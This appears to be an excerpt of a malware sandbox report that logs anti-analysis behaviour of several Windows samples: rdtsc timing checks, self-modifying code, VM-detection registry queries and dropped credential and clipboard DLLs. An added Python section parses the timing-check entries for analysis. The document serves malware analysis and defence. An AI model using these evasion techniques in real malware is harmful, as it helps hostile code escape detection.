Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E77B5 second address: 8E782D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 2C73CF7Eh 0x00000010 mov edi, eax 0x00000012 push 00000003h 0x00000014 adc ecx, 7FD27F96h 0x0000001a push 00000000h 0x0000001c jl 00007FC73488207Ch 0x00000022 sub dword ptr [ebp+122D1C81h], esi 0x00000028 push 00000003h 0x0000002a mov edi, dword ptr [ebp+122D3AB2h] 0x00000030 call 00007FC734882079h 0x00000035 jg 00007FC734882088h 0x0000003b jmp 00007FC734882082h 0x00000040 push eax 0x00000041 push ecx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FC734882084h 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E782D second address: 8E7842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jbe 00007FC734E5F776h 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7842 second address: 8E787E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007FC734882076h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jp 00007FC73488208Ch 0x00000014 jmp 00007FC734882086h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jp 00007FC73488207Ch 0x00000025 jng 00007FC734882076h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E796C second address: 8E7970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7970 second address: 8E7A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FC734882076h 0x0000000d jns 00007FC734882076h 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 jnc 00007FC734882080h 0x0000001f pop eax 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007FC734882078h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a push 00000003h 0x0000003c mov dword ptr [ebp+122D2C80h], esi 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ecx 0x00000047 call 00007FC734882078h 0x0000004c pop ecx 0x0000004d mov dword ptr [esp+04h], ecx 0x00000051 add dword ptr [esp+04h], 0000001Bh 0x00000059 inc ecx 0x0000005a push ecx 0x0000005b ret 0x0000005c pop ecx 0x0000005d ret 0x0000005e mov ecx, dword ptr [ebp+122D3BE2h] 0x00000064 push 00000003h 0x00000066 jns 00007FC734882082h 0x0000006c call 00007FC734882079h 0x00000071 jmp 00007FC734882080h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007FC73488207Eh 0x00000080 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7A2D second address: 8E7A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7A31 second address: 8E7A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7A37 second address: 8E7A69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F785h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jp 00007FC734E5F77Eh 0x00000013 jnc 00007FC734E5F778h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7A69 second address: 8E7A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jg 00007FC734882076h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7A7E second address: 8E7B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC734E5F788h 0x00000008 jmp 00007FC734E5F781h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FC734E5F778h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b lea ebx, dword ptr [ebp+1244C644h] 0x00000031 jmp 00007FC734E5F789h 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 jmp 00007FC734E5F77Dh 0x0000003d jmp 00007FC734E5F77Dh 0x00000042 popad 0x00000043 push eax 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7BD8 second address: 8E7BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8D7DAD second address: 8D7DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC734E5F776h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8D7DB7 second address: 8D7DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8D7DBB second address: 8D7DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FC734E5F776h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FC734E5F776h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 9065C5 second address: 9065D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 9065D0 second address: 9065D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 90689D second address: 9068A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 906F69 second address: 906F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F77Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 906F7F second address: 906F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 906F85 second address: 906F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 9070F1 second address: 9070FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 9070FC second address: 907101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 90728D second address: 907298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
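Each "RDTSC instruction interceptor" line above is one pair of consecutive rdtsc executions in explorha.exe together with the bytes between them. The stub reads the timestamp counter, runs a few filler instructions, reads it again and compares the two values: under single-stepping, emulation or an instruction hook the gap becomes implausibly large, which is the behaviour behind the "Potentially malicious time measurement code found" signature in the overview. The sandbox intercepts the instruction so that the values it returns stay plausible. The Python below is added here as an illustration and is not part of the report or of any of the samples; it parses such lines, classifies what sits between the two reads and checks that consecutive entries chain end-to-start. The four input lines are copied from the entries above (the three contiguous ones starting at 8E4B36 and the one at 8E77B5, where real work is interleaved between the reads); the padding/branch/work split is this example's own heuristic.

```python
import re
from collections import Counter

# Constructed input: four "RDTSC instruction interceptor" lines copied from this
# report (explorha.exe). The first three are consecutive; the fourth (8E77B5) is
# from a later region where real work sits between the two reads.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4B36 second address: 8E4B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc",
    r"Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4B4B second address: 8E4B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc",
    r"Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4B51 second address: 8E4B7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007FC734E5F776h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FC734E5F781h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC734E5F77Dh 0x00000019 rdtsc",
    r"Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E77B5 second address: 8E782D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 2C73CF7Eh 0x00000010 mov edi, eax 0x00000012 push 00000003h 0x00000014 adc ecx, 7FD27F96h 0x0000001a push 00000000h 0x0000001c jl 00007FC73488207Ch 0x00000022 sub dword ptr [ebp+122D1C81h], esi 0x00000028 push 00000003h 0x0000002a mov edi, dword ptr [ebp+122D3AB2h] 0x00000030 call 00007FC734882079h 0x00000035 jg 00007FC734882088h 0x0000003b jmp 00007FC734882082h 0x00000040 push eax 0x00000041 push ecx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FC734882084h 0x00000049 rdtsc",
]

ENTRY_RE = re.compile(
    r"^Source: (?P<src>.+?) RDTSC instruction interceptor: "
    r"First address: (?P<first>[0-9A-Fa-f]+) second address: (?P<second>[0-9A-Fa-f]+) "
    r"instructions: (?P<body>.+)$"
)
# The body is "0x<offset> <insn> 0x<offset> <insn> ...": split on the offsets.
# Operands use the "...h" suffix form, so no operand ever contains "0x".
OFFSET_SPLIT = re.compile(r"\s*0x[0-9A-Fa-f]{8}\s+")

# Stack effect of filler ops in dwords (32-bit process); used to show that the
# filler balances across the chain, i.e. it exists only to separate the reads.
STACK_DELTA = {"push": 1, "pop": -1, "pushad": 8, "popad": -8}


def parse_entry(line):
    """Return {'src','first','second','insns'} or None if not an interceptor line."""
    m = ENTRY_RE.match(line.strip())
    if not m:
        return None
    insns = []
    for text in OFFSET_SPLIT.split(m["body"]):
        if text:
            mnemonic, _, operands = text.partition(" ")
            insns.append((mnemonic.lower(), operands))
    return {"src": m["src"], "first": int(m["first"], 16),
            "second": int(m["second"], 16), "insns": insns}


def classify(mnemonic):
    """Heuristic (this example's own): what kind of instruction sits between reads."""
    if mnemonic == "rdtsc":
        return "rdtsc"
    if mnemonic in STACK_DELTA or mnemonic == "nop":
        return "padding"   # stack-neutral filler with no effect on program state
    if mnemonic in ("call", "ret") or mnemonic.startswith("j"):
        return "branch"    # jumps and calls that break linear disassembly
    return "work"          # arithmetic / memory ops: the stub's real computation


def summarize(entry):
    kinds = Counter(classify(m) for m, _ in entry["insns"])
    return {
        "span_bytes": entry["second"] - entry["first"],
        "reads": kinds["rdtsc"],
        "padding": kinds["padding"],
        "branch": kinds["branch"],
        "work": kinds["work"],
        "stack_delta_dwords": sum(STACK_DELTA.get(m, 0) for m, _ in entry["insns"]),
    }


def is_pure_probe(entry):
    """True when nothing between the two reads does work: a bare timing check."""
    return summarize(entry)["work"] == 0


def chain_is_contiguous(entries):
    """True when each entry's second read is the next entry's first read."""
    return all(a["second"] == b["first"] for a, b in zip(entries, entries[1:]))


ENTRIES = [e for e in map(parse_entry, SAMPLE_LINES) if e]

if __name__ == "__main__":
    for e in ENTRIES:
        print(f"{e['first']:X}-{e['second']:X}", summarize(e),
              "pure probe" if is_pure_probe(e) else "work between reads")
    print("first three chain end-to-start:", chain_is_contiguous(ENTRIES[:3]))
```

Run over the whole list, entries with work == 0 are bare timing probes wrapped in stack-neutral filler and opaque jumps, and the early ones chain: the second read of one entry is the first read of the next, with the push/pop filler balancing out across the chain. From 8E7781 onward the summaries show mov, xor, adc and sub on [ebp+...] operands between the reads, so the timing check fences the stub's actual computation rather than living in a separate loop; that is the region to disassemble once the rdtsc checks are neutralised (a debugger that patches the instruction, or a run with a fixed counter value, makes the delta constant).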
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Special instruction interceptor: First address: BEEE00 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Special instruction interceptor: First address: D8AB49 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Special instruction interceptor: First address: D8A8F3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Special instruction interceptor: First address: D95345 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Special instruction interceptor: First address: E16CC0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 76EE00 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 90AB49 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 90A8F3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 915345 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 996CC0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 3CBE93 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 5746A6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 572E9B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 3C94BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 59D955 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 57ED5D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 5FBBC6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: DBE93 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: 2846A6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: 282E9B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: D94BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: 2AD955 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: 28ED5D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: 30BBC6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Special instruction interceptor: First address: DB4648 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Special instruction interceptor: First address: BF5AF5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Special instruction interceptor: First address: E08FAD instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: BA4648 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 9E5AF5 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: BF8FAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 684648 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 4C5AF5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 6D8FAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Memory allocated: 2610000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Memory allocated: 2680000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Memory allocated: 4680000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Memory allocated: 1830000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Memory allocated: 32A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Memory allocated: 52A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_051F0CAD rdtsc 0_2_051F0CAD
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1033
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 968
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1066
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1151
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1033
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1081
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1070
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 895
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4066
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5741
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 9379
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Window / User API: threadDelayed 1149
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Window / User API: threadDelayed 821
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Window / User API: threadDelayed 1231
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Window / User API: threadDelayed 450
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Window / User API: threadDelayed 1415
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window / User API: threadDelayed 8437
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Window / User API: threadDelayed 9310
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Window / User API: threadDelayed 9274
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1788 Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2820 Thread sleep count: 1033 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2820 Thread sleep time: -2067033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7056 Thread sleep count: 968 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7056 Thread sleep time: -1936968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1292 Thread sleep count: 1066 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1292 Thread sleep time: -2133066s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 904 Thread sleep count: 254 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 904 Thread sleep time: -7620000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6472 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1784 Thread sleep count: 1151 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1784 Thread sleep time: -2303151s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 3292 Thread sleep count: 1033 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 3292 Thread sleep time: -2067033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1880 Thread sleep count: 1081 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1880 Thread sleep time: -2163081s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1576 Thread sleep count: 1070 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1576 Thread sleep time: -2141070s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1784 Thread sleep count: 895 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1784 Thread sleep time: -1790895s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3752 Thread sleep count: 9379 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3752 Thread sleep time: -9379000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5548 Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2888 Thread sleep count: 130 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2636 Thread sleep count: 129 > 30
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe TID: 1276 Thread sleep count: 1231 > 30
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe TID: 1276 Thread sleep count: 450 > 30
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe TID: 7992 Thread sleep count: 61 > 30
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe TID: 7812 Thread sleep count: 1415 > 30
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe TID: 7812 Thread sleep count: 57 > 30
